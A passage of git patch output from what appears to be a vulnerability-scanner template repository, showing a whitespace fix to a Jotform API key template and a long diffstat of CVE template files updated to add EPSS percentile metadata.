Date: Thu, 31 Aug 2023 11:33:23 +0530
Subject: [PATCH 0035/1090] fix spacing
---
http/exposures/tokens/jotform/jotform-api-key.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/http/exposures/tokens/jotform/jotform-api-key.yaml b/http/exposures/tokens/jotform/jotform-api-key.yaml
index 6a93375d23..7fa8388da0 100644
--- a/http/exposures/tokens/jotform/jotform-api-key.yaml
+++ b/http/exposures/tokens/jotform/jotform-api-key.yaml
@@ -1,7 +1,7 @@
id: jotform-api-key
info:
- name: Jotform API Key
+ name: Jotform API Key
author: Shankar Acharya
severity: info
reference:
From d428cc0c9c9fbed2400bd2ea3bdfe90050109630 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Thu, 31 Aug 2023 17:16:18 +0530
Subject: [PATCH 0036/1090] Added EPSS Percentile
---
http/cves/2000/CVE-2000-0114.yaml | 1 +
http/cves/2001/CVE-2001-0537.yaml | 3 +-
http/cves/2002/CVE-2002-1131.yaml | 1 +
http/cves/2004/CVE-2004-0519.yaml | 1 +
http/cves/2004/CVE-2004-1965.yaml | 1 +
http/cves/2005/CVE-2005-2428.yaml | 1 +
http/cves/2005/CVE-2005-3344.yaml | 1 +
http/cves/2005/CVE-2005-3634.yaml | 1 +
http/cves/2005/CVE-2005-4385.yaml | 1 +
http/cves/2006/CVE-2006-1681.yaml | 1 +
http/cves/2006/CVE-2006-2842.yaml | 1 +
http/cves/2007/CVE-2007-0885.yaml | 3 +-
http/cves/2007/CVE-2007-4504.yaml | 1 +
http/cves/2007/CVE-2007-4556.yaml | 1 +
http/cves/2007/CVE-2007-5728.yaml | 3 +-
http/cves/2008/CVE-2008-1059.yaml | 1 +
http/cves/2008/CVE-2008-1061.yaml | 1 +
http/cves/2008/CVE-2008-1547.yaml | 1 +
http/cves/2008/CVE-2008-2398.yaml | 1 +
http/cves/2008/CVE-2008-2650.yaml | 1 +
http/cves/2008/CVE-2008-4668.yaml | 1 +
http/cves/2008/CVE-2008-4764.yaml | 1 +
http/cves/2008/CVE-2008-5587.yaml | 1 +
http/cves/2008/CVE-2008-6080.yaml | 3 +-
http/cves/2008/CVE-2008-6172.yaml | 3 +-
http/cves/2008/CVE-2008-6222.yaml | 3 +-
http/cves/2008/CVE-2008-6465.yaml | 1 +
http/cves/2008/CVE-2008-6668.yaml | 1 +
http/cves/2008/CVE-2008-6982.yaml | 1 +
http/cves/2008/CVE-2008-7269.yaml | 3 +-
http/cves/2009/CVE-2009-0347.yaml | 3 +-
http/cves/2009/CVE-2009-0545.yaml | 1 +
http/cves/2009/CVE-2009-0932.yaml | 1 +
http/cves/2009/CVE-2009-1151.yaml | 1 +
http/cves/2009/CVE-2009-1496.yaml | 1 +
http/cves/2009/CVE-2009-1558.yaml | 1 +
http/cves/2009/CVE-2009-1872.yaml | 1 +
http/cves/2009/CVE-2009-2015.yaml | 1 +
http/cves/2009/CVE-2009-2100.yaml | 1 +
http/cves/2009/CVE-2009-3053.yaml | 1 +
http/cves/2009/CVE-2009-3318.yaml | 1 +
http/cves/2009/CVE-2009-4202.yaml | 1 +
http/cves/2009/CVE-2009-4223.yaml | 1 +
http/cves/2009/CVE-2009-4679.yaml | 2 +-
http/cves/2009/CVE-2009-5020.yaml | 1 +
http/cves/2009/CVE-2009-5114.yaml | 1 +
http/cves/2010/CVE-2010-0157.yaml | 2 +-
http/cves/2010/CVE-2010-0219.yaml | 3 +-
http/cves/2010/CVE-2010-0467.yaml | 1 +
http/cves/2010/CVE-2010-0696.yaml | 1 +
http/cves/2010/CVE-2010-0759.yaml | 1 +
http/cves/2010/CVE-2010-0942.yaml | 1 +
http/cves/2010/CVE-2010-0943.yaml | 1 +
http/cves/2010/CVE-2010-0944.yaml | 1 +
http/cves/2010/CVE-2010-0972.yaml | 1 +
http/cves/2010/CVE-2010-0982.yaml | 3 +-
http/cves/2010/CVE-2010-0985.yaml | 1 +
http/cves/2010/CVE-2010-1056.yaml | 1 +
http/cves/2010/CVE-2010-1081.yaml | 1 +
http/cves/2010/CVE-2010-1217.yaml | 1 +
http/cves/2010/CVE-2010-1219.yaml | 1 +
http/cves/2010/CVE-2010-1302.yaml | 3 +-
http/cves/2010/CVE-2010-1304.yaml | 1 +
http/cves/2010/CVE-2010-1305.yaml | 1 +
http/cves/2010/CVE-2010-1306.yaml | 1 +
http/cves/2010/CVE-2010-1307.yaml | 1 +
http/cves/2010/CVE-2010-1308.yaml | 1 +
http/cves/2010/CVE-2010-1312.yaml | 2 +-
http/cves/2010/CVE-2010-1313.yaml | 2 +-
http/cves/2010/CVE-2010-1314.yaml | 2 +-
http/cves/2010/CVE-2010-1315.yaml | 1 +
http/cves/2010/CVE-2010-1340.yaml | 1 +
http/cves/2010/CVE-2010-1345.yaml | 1 +
http/cves/2010/CVE-2010-1352.yaml | 1 +
http/cves/2010/CVE-2010-1353.yaml | 1 +
http/cves/2010/CVE-2010-1354.yaml | 1 +
http/cves/2010/CVE-2010-1429.yaml | 1 +
http/cves/2010/CVE-2010-1461.yaml | 2 +-
http/cves/2010/CVE-2010-1469.yaml | 1 +
http/cves/2010/CVE-2010-1470.yaml | 1 +
http/cves/2010/CVE-2010-1471.yaml | 1 +
http/cves/2010/CVE-2010-1472.yaml | 1 +
http/cves/2010/CVE-2010-1473.yaml | 2 +-
http/cves/2010/CVE-2010-1474.yaml | 1 +
http/cves/2010/CVE-2010-1475.yaml | 1 +
http/cves/2010/CVE-2010-1476.yaml | 1 +
http/cves/2010/CVE-2010-1478.yaml | 3 +-
http/cves/2010/CVE-2010-1491.yaml | 1 +
http/cves/2010/CVE-2010-1494.yaml | 1 +
http/cves/2010/CVE-2010-1495.yaml | 1 +
http/cves/2010/CVE-2010-1531.yaml | 1 +
http/cves/2010/CVE-2010-1532.yaml | 2 +-
http/cves/2010/CVE-2010-1533.yaml | 2 +-
http/cves/2010/CVE-2010-1534.yaml | 3 +-
http/cves/2010/CVE-2010-1535.yaml | 2 +-
http/cves/2010/CVE-2010-1540.yaml | 3 +-
http/cves/2010/CVE-2010-1586.yaml | 3 +-
http/cves/2010/CVE-2010-1601.yaml | 1 +
http/cves/2010/CVE-2010-1602.yaml | 1 +
http/cves/2010/CVE-2010-1603.yaml | 1 +
http/cves/2010/CVE-2010-1607.yaml | 1 +
http/cves/2010/CVE-2010-1653.yaml | 1 +
http/cves/2010/CVE-2010-1657.yaml | 1 +
http/cves/2010/CVE-2010-1658.yaml | 1 +
http/cves/2010/CVE-2010-1659.yaml | 1 +
http/cves/2010/CVE-2010-1714.yaml | 1 +
http/cves/2010/CVE-2010-1715.yaml | 1 +
http/cves/2010/CVE-2010-1717.yaml | 1 +
http/cves/2010/CVE-2010-1718.yaml | 3 +-
http/cves/2010/CVE-2010-1719.yaml | 1 +
http/cves/2010/CVE-2010-1722.yaml | 1 +
http/cves/2010/CVE-2010-1723.yaml | 1 +
http/cves/2010/CVE-2010-1858.yaml | 1 +
http/cves/2010/CVE-2010-1870.yaml | 3 +-
http/cves/2010/CVE-2010-1875.yaml | 3 +-
http/cves/2010/CVE-2010-1878.yaml | 1 +
http/cves/2010/CVE-2010-1952.yaml | 1 +
http/cves/2010/CVE-2010-1953.yaml | 1 +
http/cves/2010/CVE-2010-1954.yaml | 1 +
http/cves/2010/CVE-2010-1955.yaml | 1 +
http/cves/2010/CVE-2010-1956.yaml | 1 +
http/cves/2010/CVE-2010-1957.yaml | 1 +
http/cves/2010/CVE-2010-1977.yaml | 3 +-
http/cves/2010/CVE-2010-1979.yaml | 1 +
http/cves/2010/CVE-2010-1980.yaml | 1 +
http/cves/2010/CVE-2010-1981.yaml | 1 +
http/cves/2010/CVE-2010-1982.yaml | 3 +-
http/cves/2010/CVE-2010-1983.yaml | 1 +
http/cves/2010/CVE-2010-2033.yaml | 3 +-
http/cves/2010/CVE-2010-2034.yaml | 1 +
http/cves/2010/CVE-2010-2035.yaml | 1 +
http/cves/2010/CVE-2010-2036.yaml | 1 +
http/cves/2010/CVE-2010-2037.yaml | 1 +
http/cves/2010/CVE-2010-2045.yaml | 1 +
http/cves/2010/CVE-2010-2050.yaml | 1 +
http/cves/2010/CVE-2010-2122.yaml | 1 +
http/cves/2010/CVE-2010-2128.yaml | 1 +
http/cves/2010/CVE-2010-2259.yaml | 1 +
http/cves/2010/CVE-2010-2307.yaml | 1 +
http/cves/2010/CVE-2010-2507.yaml | 1 +
http/cves/2010/CVE-2010-2680.yaml | 1 +
http/cves/2010/CVE-2010-2682.yaml | 1 +
http/cves/2010/CVE-2010-2857.yaml | 1 +
http/cves/2010/CVE-2010-2861.yaml | 3 +-
http/cves/2010/CVE-2010-2918.yaml | 1 +
http/cves/2010/CVE-2010-2920.yaml | 1 +
http/cves/2010/CVE-2010-3203.yaml | 1 +
http/cves/2010/CVE-2010-3426.yaml | 1 +
http/cves/2010/CVE-2010-4231.yaml | 3 +-
http/cves/2010/CVE-2010-4239.yaml | 4 +-
http/cves/2010/CVE-2010-4282.yaml | 1 +
http/cves/2010/CVE-2010-4617.yaml | 1 +
http/cves/2010/CVE-2010-4719.yaml | 1 +
http/cves/2010/CVE-2010-4769.yaml | 3 +-
http/cves/2010/CVE-2010-4977.yaml | 3 +-
http/cves/2010/CVE-2010-5028.yaml | 3 +-
http/cves/2010/CVE-2010-5278.yaml | 3 +-
http/cves/2010/CVE-2010-5286.yaml | 1 +
http/cves/2011/CVE-2011-0049.yaml | 1 +
http/cves/2011/CVE-2011-1669.yaml | 1 +
http/cves/2011/CVE-2011-2744.yaml | 3 +-
http/cves/2011/CVE-2011-2780.yaml | 3 +-
http/cves/2011/CVE-2011-3315.yaml | 3 +-
http/cves/2011/CVE-2011-4336.yaml | 1 +
http/cves/2011/CVE-2011-4618.yaml | 4 +-
http/cves/2011/CVE-2011-4624.yaml | 3 +-
http/cves/2011/CVE-2011-4804.yaml | 1 +
http/cves/2011/CVE-2011-4926.yaml | 3 +-
http/cves/2011/CVE-2011-5106.yaml | 1 +
http/cves/2011/CVE-2011-5107.yaml | 1 +
http/cves/2011/CVE-2011-5179.yaml | 1 +
http/cves/2011/CVE-2011-5181.yaml | 1 +
http/cves/2011/CVE-2011-5252.yaml | 3 +-
http/cves/2011/CVE-2011-5265.yaml | 1 +
http/cves/2012/CVE-2012-0392.yaml | 1 +
http/cves/2012/CVE-2012-0394.yaml | 1 +
http/cves/2012/CVE-2012-0896.yaml | 1 +
http/cves/2012/CVE-2012-0901.yaml | 1 +
http/cves/2012/CVE-2012-0981.yaml | 1 +
http/cves/2012/CVE-2012-0991.yaml | 1 +
http/cves/2012/CVE-2012-0996.yaml | 1 +
http/cves/2012/CVE-2012-1226.yaml | 1 +
http/cves/2012/CVE-2012-1823.yaml | 1 +
http/cves/2012/CVE-2012-1835.yaml | 1 +
http/cves/2012/CVE-2012-2371.yaml | 1 +
http/cves/2012/CVE-2012-3153.yaml | 1 +
http/cves/2012/CVE-2012-4032.yaml | 9 +-
http/cves/2012/CVE-2012-4242.yaml | 5 +-
http/cves/2012/CVE-2012-4253.yaml | 1 +
http/cves/2012/CVE-2012-4273.yaml | 1 +
http/cves/2012/CVE-2012-4547.yaml | 1 +
http/cves/2012/CVE-2012-4768.yaml | 1 +
http/cves/2012/CVE-2012-4878.yaml | 1 +
http/cves/2012/CVE-2012-4889.yaml | 1 +
http/cves/2012/CVE-2012-4940.yaml | 3 +-
http/cves/2012/CVE-2012-4982.yaml | 1 +
http/cves/2012/CVE-2012-5321.yaml | 1 +
http/cves/2012/CVE-2012-5913.yaml | 3 +-
http/cves/2012/CVE-2012-6499.yaml | 3 +-
http/cves/2013/CVE-2013-1965.yaml | 1 +
http/cves/2013/CVE-2013-2248.yaml | 3 +-
http/cves/2013/CVE-2013-2251.yaml | 1 +
http/cves/2013/CVE-2013-2287.yaml | 1 +
http/cves/2013/CVE-2013-2621.yaml | 3 +-
http/cves/2013/CVE-2013-3526.yaml | 1 +
http/cves/2013/CVE-2013-3827.yaml | 3 +-
http/cves/2013/CVE-2013-4117.yaml | 1 +
http/cves/2013/CVE-2013-4625.yaml | 3 +-
http/cves/2013/CVE-2013-5528.yaml | 1 +
http/cves/2013/CVE-2013-5979.yaml | 3 +-
http/cves/2013/CVE-2013-6281.yaml | 2 +-
http/cves/2013/CVE-2013-7091.yaml | 1 +
http/cves/2013/CVE-2013-7240.yaml | 1 +
http/cves/2013/CVE-2013-7285.yaml | 1 +
http/cves/2014/CVE-2014-10037.yaml | 3 +-
http/cves/2014/CVE-2014-1203.yaml | 1 +
http/cves/2014/CVE-2014-2321.yaml | 1 +
http/cves/2014/CVE-2014-2323.yaml | 1 +
http/cves/2014/CVE-2014-2383.yaml | 1 +
http/cves/2014/CVE-2014-2908.yaml | 1 +
http/cves/2014/CVE-2014-2962.yaml | 1 +
http/cves/2014/CVE-2014-3120.yaml | 3 +-
http/cves/2014/CVE-2014-3206.yaml | 3 +-
http/cves/2014/CVE-2014-3704.yaml | 1 +
http/cves/2014/CVE-2014-3744.yaml | 1 +
http/cves/2014/CVE-2014-4210.yaml | 1 +
http/cves/2014/CVE-2014-4513.yaml | 1 +
http/cves/2014/CVE-2014-4535.yaml | 1 +
http/cves/2014/CVE-2014-4536.yaml | 1 +
http/cves/2014/CVE-2014-4539.yaml | 1 +
http/cves/2014/CVE-2014-4544.yaml | 1 +
http/cves/2014/CVE-2014-4550.yaml | 1 +
http/cves/2014/CVE-2014-4558.yaml | 1 +
http/cves/2014/CVE-2014-4561.yaml | 1 +
http/cves/2014/CVE-2014-4592.yaml | 9 +-
http/cves/2014/CVE-2014-4940.yaml | 1 +
http/cves/2014/CVE-2014-4942.yaml | 3 +-
http/cves/2014/CVE-2014-5111.yaml | 1 +
http/cves/2014/CVE-2014-5258.yaml | 1 +
http/cves/2014/CVE-2014-5368.yaml | 1 +
http/cves/2014/CVE-2014-6271.yaml | 1 +
http/cves/2014/CVE-2014-6287.yaml | 3 +-
http/cves/2014/CVE-2014-6308.yaml | 1 +
http/cves/2014/CVE-2014-8676.yaml | 1 +
http/cves/2014/CVE-2014-8682.yaml | 1 +
http/cves/2014/CVE-2014-8799.yaml | 1 +
http/cves/2014/CVE-2014-9094.yaml | 1 +
http/cves/2014/CVE-2014-9119.yaml | 3 +-
http/cves/2014/CVE-2014-9444.yaml | 1 +
http/cves/2014/CVE-2014-9606.yaml | 1 +
http/cves/2014/CVE-2014-9607.yaml | 1 +
http/cves/2014/CVE-2014-9608.yaml | 3 +-
http/cves/2014/CVE-2014-9609.yaml | 3 +-
http/cves/2014/CVE-2014-9614.yaml | 1 +
http/cves/2014/CVE-2014-9615.yaml | 1 +
http/cves/2014/CVE-2014-9617.yaml | 1 +
http/cves/2014/CVE-2014-9618.yaml | 3 +-
http/cves/2015/CVE-2015-0554.yaml | 1 +
http/cves/2015/CVE-2015-1000005.yaml | 3 +-
http/cves/2015/CVE-2015-1000010.yaml | 1 +
http/cves/2015/CVE-2015-1000012.yaml | 1 +
http/cves/2015/CVE-2015-1427.yaml | 3 +-
http/cves/2015/CVE-2015-1503.yaml | 3 +-
http/cves/2015/CVE-2015-1579.yaml | 1 +
http/cves/2015/CVE-2015-1880.yaml | 1 +
http/cves/2015/CVE-2015-2067.yaml | 1 +
http/cves/2015/CVE-2015-2068.yaml | 1 +
http/cves/2015/CVE-2015-2080.yaml | 1 +
http/cves/2015/CVE-2015-2166.yaml | 3 +-
http/cves/2015/CVE-2015-2196.yaml | 1 +
http/cves/2015/CVE-2015-2755.yaml | 1 +
http/cves/2015/CVE-2015-2807.yaml | 3 +-
http/cves/2015/CVE-2015-2863.yaml | 1 +
http/cves/2015/CVE-2015-2996.yaml | 1 +
http/cves/2015/CVE-2015-3035.yaml | 1 +
http/cves/2015/CVE-2015-3224.yaml | 1 +
http/cves/2015/CVE-2015-3337.yaml | 1 +
http/cves/2015/CVE-2015-3648.yaml | 1 +
http/cves/2015/CVE-2015-3897.yaml | 3 +-
http/cves/2015/CVE-2015-4050.yaml | 1 +
http/cves/2015/CVE-2015-4062.yaml | 1 +
http/cves/2015/CVE-2015-4063.yaml | 3 +-
http/cves/2015/CVE-2015-4074.yaml | 1 +
http/cves/2015/CVE-2015-4127.yaml | 1 +
http/cves/2015/CVE-2015-4414.yaml | 3 +-
http/cves/2015/CVE-2015-4632.yaml | 1 +
http/cves/2015/CVE-2015-4666.yaml | 1 +
http/cves/2015/CVE-2015-4668.yaml | 1 +
http/cves/2015/CVE-2015-4694.yaml | 3 +-
http/cves/2015/CVE-2015-5354.yaml | 1 +
http/cves/2015/CVE-2015-5461.yaml | 1 +
http/cves/2015/CVE-2015-5469.yaml | 1 +
http/cves/2015/CVE-2015-5471.yaml | 3 +-
http/cves/2015/CVE-2015-5531.yaml | 1 +
http/cves/2015/CVE-2015-5688.yaml | 1 +
http/cves/2015/CVE-2015-6477.yaml | 3 +-
http/cves/2015/CVE-2015-6544.yaml | 1 +
http/cves/2015/CVE-2015-6920.yaml | 1 +
http/cves/2015/CVE-2015-7245.yaml | 1 +
http/cves/2015/CVE-2015-7297.yaml | 1 +
http/cves/2015/CVE-2015-7377.yaml | 1 +
http/cves/2015/CVE-2015-7450.yaml | 3 +-
http/cves/2015/CVE-2015-7780.yaml | 1 +
http/cves/2015/CVE-2015-7823.yaml | 1 +
http/cves/2015/CVE-2015-8349.yaml | 3 +-
http/cves/2015/CVE-2015-8399.yaml | 1 +
http/cves/2015/CVE-2015-8813.yaml | 1 +
http/cves/2015/CVE-2015-9312.yaml | 1 +
http/cves/2015/CVE-2015-9323.yaml | 13 ++-
http/cves/2015/CVE-2015-9414.yaml | 1 +
http/cves/2015/CVE-2015-9480.yaml | 3 +-
http/cves/2016/CVE-2016-0957.yaml | 1 +
http/cves/2016/CVE-2016-1000126.yaml | 1 +
http/cves/2016/CVE-2016-1000127.yaml | 1 +
http/cves/2016/CVE-2016-1000128.yaml | 1 +
http/cves/2016/CVE-2016-1000129.yaml | 1 +
http/cves/2016/CVE-2016-1000130.yaml | 1 +
http/cves/2016/CVE-2016-1000131.yaml | 1 +
http/cves/2016/CVE-2016-1000132.yaml | 1 +
http/cves/2016/CVE-2016-1000133.yaml | 1 +
http/cves/2016/CVE-2016-1000134.yaml | 1 +
http/cves/2016/CVE-2016-1000135.yaml | 1 +
http/cves/2016/CVE-2016-1000136.yaml | 1 +
http/cves/2016/CVE-2016-1000137.yaml | 1 +
http/cves/2016/CVE-2016-1000138.yaml | 1 +
http/cves/2016/CVE-2016-1000139.yaml | 1 +
http/cves/2016/CVE-2016-1000140.yaml | 1 +
http/cves/2016/CVE-2016-1000141.yaml | 1 +
http/cves/2016/CVE-2016-1000142.yaml | 1 +
http/cves/2016/CVE-2016-1000143.yaml | 1 +
http/cves/2016/CVE-2016-1000146.yaml | 1 +
http/cves/2016/CVE-2016-1000148.yaml | 1 +
http/cves/2016/CVE-2016-1000149.yaml | 1 +
http/cves/2016/CVE-2016-1000152.yaml | 1 +
http/cves/2016/CVE-2016-1000153.yaml | 1 +
http/cves/2016/CVE-2016-1000154.yaml | 1 +
http/cves/2016/CVE-2016-1000155.yaml | 1 +
http/cves/2016/CVE-2016-10033.yaml | 1 +
http/cves/2016/CVE-2016-10108.yaml | 6 +-
http/cves/2016/CVE-2016-10134.yaml | 3 +-
http/cves/2016/CVE-2016-10367.yaml | 1 +
http/cves/2016/CVE-2016-10368.yaml | 1 +
http/cves/2016/CVE-2016-10924.yaml | 3 +-
http/cves/2016/CVE-2016-10940.yaml | 1 +
http/cves/2016/CVE-2016-10956.yaml | 3 +-
http/cves/2016/CVE-2016-10960.yaml | 2 +-
http/cves/2016/CVE-2016-10973.yaml | 1 +
http/cves/2016/CVE-2016-10993.yaml | 1 +
http/cves/2016/CVE-2016-1555.yaml | 3 +-
http/cves/2016/CVE-2016-2389.yaml | 1 +
http/cves/2016/CVE-2016-3081.yaml | 1 +
http/cves/2016/CVE-2016-3088.yaml | 1 +
http/cves/2016/CVE-2016-3978.yaml | 1 +
http/cves/2016/CVE-2016-4437.yaml | 3 +-
http/cves/2016/CVE-2016-4975.yaml | 3 +-
http/cves/2016/CVE-2016-4977.yaml | 1 +
http/cves/2016/CVE-2016-5649.yaml | 3 +-
http/cves/2016/CVE-2016-6195.yaml | 1 +
http/cves/2016/CVE-2016-6277.yaml | 1 +
http/cves/2016/CVE-2016-6601.yaml | 3 +-
http/cves/2016/CVE-2016-7552.yaml | 3 +-
http/cves/2016/CVE-2016-7834.yaml | 1 +
http/cves/2016/CVE-2016-7981.yaml | 1 +
http/cves/2016/CVE-2016-8527.yaml | 3 +-
http/cves/2017/CVE-2017-0929.yaml | 1 +
http/cves/2017/CVE-2017-1000028.yaml | 1 +
http/cves/2017/CVE-2017-1000029.yaml | 1 +
http/cves/2017/CVE-2017-1000163.yaml | 1 +
http/cves/2017/CVE-2017-1000170.yaml | 1 +
http/cves/2017/CVE-2017-1000486.yaml | 3 +-
http/cves/2017/CVE-2017-10075.yaml | 1 +
http/cves/2017/CVE-2017-10271.yaml | 3 +-
http/cves/2017/CVE-2017-10974.yaml | 1 +
http/cves/2017/CVE-2017-11165.yaml | 1 +
http/cves/2017/CVE-2017-11444.yaml | 3 +-
http/cves/2017/CVE-2017-11512.yaml | 1 +
http/cves/2017/CVE-2017-11586.yaml | 1 +
http/cves/2017/CVE-2017-11610.yaml | 3 +-
http/cves/2017/CVE-2017-11629.yaml | 1 +
http/cves/2017/CVE-2017-12138.yaml | 1 +
http/cves/2017/CVE-2017-12149.yaml | 3 +-
http/cves/2017/CVE-2017-12542.yaml | 3 +-
http/cves/2017/CVE-2017-12544.yaml | 1 +
http/cves/2017/CVE-2017-12583.yaml | 1 +
http/cves/2017/CVE-2017-12611.yaml | 1 +
http/cves/2017/CVE-2017-12615.yaml | 1 +
http/cves/2017/CVE-2017-12617.yaml | 3 +-
http/cves/2017/CVE-2017-12629.yaml | 3 +-
http/cves/2017/CVE-2017-12635.yaml | 1 +
http/cves/2017/CVE-2017-12637.yaml | 1 +
http/cves/2017/CVE-2017-12794.yaml | 1 +
http/cves/2017/CVE-2017-14135.yaml | 1 +
http/cves/2017/CVE-2017-14186.yaml | 1 +
http/cves/2017/CVE-2017-14524.yaml | 3 +-
http/cves/2017/CVE-2017-14535.yaml | 3 +-
http/cves/2017/CVE-2017-14537.yaml | 1 +
http/cves/2017/CVE-2017-14622.yaml | 1 +
http/cves/2017/CVE-2017-14651.yaml | 1 +
http/cves/2017/CVE-2017-14849.yaml | 1 +
http/cves/2017/CVE-2017-15287.yaml | 1 +
http/cves/2017/CVE-2017-15363.yaml | 1 +
http/cves/2017/CVE-2017-15647.yaml | 1 +
http/cves/2017/CVE-2017-15715.yaml | 3 +-
http/cves/2017/CVE-2017-15944.yaml | 3 +-
http/cves/2017/CVE-2017-16806.yaml | 1 +
http/cves/2017/CVE-2017-16877.yaml | 1 +
http/cves/2017/CVE-2017-16894.yaml | 1 +
http/cves/2017/CVE-2017-17043.yaml | 1 +
http/cves/2017/CVE-2017-17059.yaml | 1 +
http/cves/2017/CVE-2017-17451.yaml | 1 +
http/cves/2017/CVE-2017-17562.yaml | 1 +
http/cves/2017/CVE-2017-17731.yaml | 3 +-
http/cves/2017/CVE-2017-17736.yaml | 1 +
http/cves/2017/CVE-2017-18024.yaml | 1 +
http/cves/2017/CVE-2017-18536.yaml | 1 +
http/cves/2017/CVE-2017-18598.yaml | 1 +
http/cves/2017/CVE-2017-18638.yaml | 1 +
http/cves/2017/CVE-2017-3506.yaml | 1 +
http/cves/2017/CVE-2017-3528.yaml | 1 +
http/cves/2017/CVE-2017-4011.yaml | 1 +
http/cves/2017/CVE-2017-5487.yaml | 3 +-
http/cves/2017/CVE-2017-5521.yaml | 1 +
http/cves/2017/CVE-2017-5631.yaml | 1 +
http/cves/2017/CVE-2017-5638.yaml | 1 +
http/cves/2017/CVE-2017-5689.yaml | 3 +-
http/cves/2017/CVE-2017-5982.yaml | 1 +
http/cves/2017/CVE-2017-6090.yaml | 3 +-
http/cves/2017/CVE-2017-7269.yaml | 1 +
http/cves/2017/CVE-2017-7391.yaml | 1 +
http/cves/2017/CVE-2017-7615.yaml | 3 +-
http/cves/2017/CVE-2017-7921.yaml | 1 +
http/cves/2017/CVE-2017-7925.yaml | 4 +-
http/cves/2017/CVE-2017-8229.yaml | 9 +-
http/cves/2017/CVE-2017-8917.yaml | 1 +
http/cves/2017/CVE-2017-9140.yaml | 1 +
http/cves/2017/CVE-2017-9288.yaml | 1 +
http/cves/2017/CVE-2017-9416.yaml | 3 +-
http/cves/2017/CVE-2017-9506.yaml | 1 +
http/cves/2017/CVE-2017-9791.yaml | 3 +-
http/cves/2017/CVE-2017-9805.yaml | 3 +-
http/cves/2017/CVE-2017-9822.yaml | 3 +-
http/cves/2017/CVE-2017-9833.yaml | 1 +
http/cves/2017/CVE-2017-9841.yaml | 1 +
http/cves/2018/CVE-2018-0127.yaml | 5 +-
http/cves/2018/CVE-2018-0296.yaml | 5 +-
http/cves/2018/CVE-2018-1000129.yaml | 1 +
http/cves/2018/CVE-2018-1000130.yaml | 3 +-
http/cves/2018/CVE-2018-1000226.yaml | 1 +
http/cves/2018/CVE-2018-1000533.yaml | 1 +
http/cves/2018/CVE-2018-1000600.yaml | 1 +
http/cves/2018/CVE-2018-1000671.yaml | 1 +
http/cves/2018/CVE-2018-1000856.yaml | 1 +
http/cves/2018/CVE-2018-1000861.yaml | 1 +
http/cves/2018/CVE-2018-10093.yaml | 1 +
http/cves/2018/CVE-2018-10095.yaml | 1 +
http/cves/2018/CVE-2018-10141.yaml | 1 +
http/cves/2018/CVE-2018-10201.yaml | 3 +-
http/cves/2018/CVE-2018-10230.yaml | 1 +
http/cves/2018/CVE-2018-10562.yaml | 3 +-
http/cves/2018/CVE-2018-10822.yaml | 1 +
http/cves/2018/CVE-2018-10823.yaml | 1 +
http/cves/2018/CVE-2018-10956.yaml | 3 +-
http/cves/2018/CVE-2018-11227.yaml | 1 +
http/cves/2018/CVE-2018-11231.yaml | 1 +
http/cves/2018/CVE-2018-11409.yaml | 3 +-
http/cves/2018/CVE-2018-11473.yaml | 1 +
http/cves/2018/CVE-2018-11709.yaml | 1 +
http/cves/2018/CVE-2018-11759.yaml | 3 +-
http/cves/2018/CVE-2018-11776.yaml | 3 +-
http/cves/2018/CVE-2018-11784.yaml | 3 +-
http/cves/2018/CVE-2018-12031.yaml | 1 +
http/cves/2018/CVE-2018-12054.yaml | 3 +-
http/cves/2018/CVE-2018-1207.yaml | 3 +-
http/cves/2018/CVE-2018-12095.yaml | 1 +
http/cves/2018/CVE-2018-12296.yaml | 3 +-
http/cves/2018/CVE-2018-12300.yaml | 1 +
http/cves/2018/CVE-2018-12613.yaml | 3 +-
http/cves/2018/CVE-2018-12634.yaml | 3 +-
http/cves/2018/CVE-2018-12675.yaml | 1 +
http/cves/2018/CVE-2018-1271.yaml | 3 +-
http/cves/2018/CVE-2018-1273.yaml | 3 +-
http/cves/2018/CVE-2018-12909.yaml | 7 +-
http/cves/2018/CVE-2018-12998.yaml | 3 +-
http/cves/2018/CVE-2018-1335.yaml | 3 +-
http/cves/2018/CVE-2018-13379.yaml | 3 +-
http/cves/2018/CVE-2018-13380.yaml | 1 +
http/cves/2018/CVE-2018-13980.yaml | 1 +
http/cves/2018/CVE-2018-14013.yaml | 3 +-
http/cves/2018/CVE-2018-14064.yaml | 1 +
http/cves/2018/CVE-2018-14474.yaml | 1 +
http/cves/2018/CVE-2018-14574.yaml | 3 +-
http/cves/2018/CVE-2018-14728.yaml | 3 +-
http/cves/2018/CVE-2018-14912.yaml | 3 +-
http/cves/2018/CVE-2018-14916.yaml | 1 +
http/cves/2018/CVE-2018-14918.yaml | 1 +
http/cves/2018/CVE-2018-14931.yaml | 1 +
http/cves/2018/CVE-2018-15138.yaml | 3 +-
http/cves/2018/CVE-2018-15517.yaml | 1 +
http/cves/2018/CVE-2018-15535.yaml | 3 +-
http/cves/2018/CVE-2018-15745.yaml | 3 +-
http/cves/2018/CVE-2018-15961.yaml | 3 +-
http/cves/2018/CVE-2018-16059.yaml | 3 +-
http/cves/2018/CVE-2018-16133.yaml | 3 +-
http/cves/2018/CVE-2018-16139.yaml | 1 +
http/cves/2018/CVE-2018-16159.yaml | 3 +-
http/cves/2018/CVE-2018-16167.yaml | 1 +
http/cves/2018/CVE-2018-16283.yaml | 3 +-
http/cves/2018/CVE-2018-16288.yaml | 3 +-
http/cves/2018/CVE-2018-16299.yaml | 3 +-
http/cves/2018/CVE-2018-16341.yaml | 6 +-
http/cves/2018/CVE-2018-16668.yaml | 3 +-
http/cves/2018/CVE-2018-16670.yaml | 3 +-
http/cves/2018/CVE-2018-16671.yaml | 3 +-
http/cves/2018/CVE-2018-16716.yaml | 3 +-
http/cves/2018/CVE-2018-16761.yaml | 1 +
http/cves/2018/CVE-2018-16763.yaml | 3 +-
http/cves/2018/CVE-2018-16836.yaml | 3 +-
http/cves/2018/CVE-2018-16979.yaml | 1 +
http/cves/2018/CVE-2018-17246.yaml | 1 +
http/cves/2018/CVE-2018-17254.yaml | 4 +-
http/cves/2018/CVE-2018-17422.yaml | 1 +
http/cves/2018/CVE-2018-17431.yaml | 1 +
http/cves/2018/CVE-2018-18069.yaml | 1 +
http/cves/2018/CVE-2018-18264.yaml | 3 +-
http/cves/2018/CVE-2018-18323.yaml | 1 +
http/cves/2018/CVE-2018-18570.yaml | 1 +
http/cves/2018/CVE-2018-18608.yaml | 1 +
http/cves/2018/CVE-2018-18775.yaml | 1 +
http/cves/2018/CVE-2018-18777.yaml | 1 +
http/cves/2018/CVE-2018-18778.yaml | 1 +
http/cves/2018/CVE-2018-18809.yaml | 14 ++-
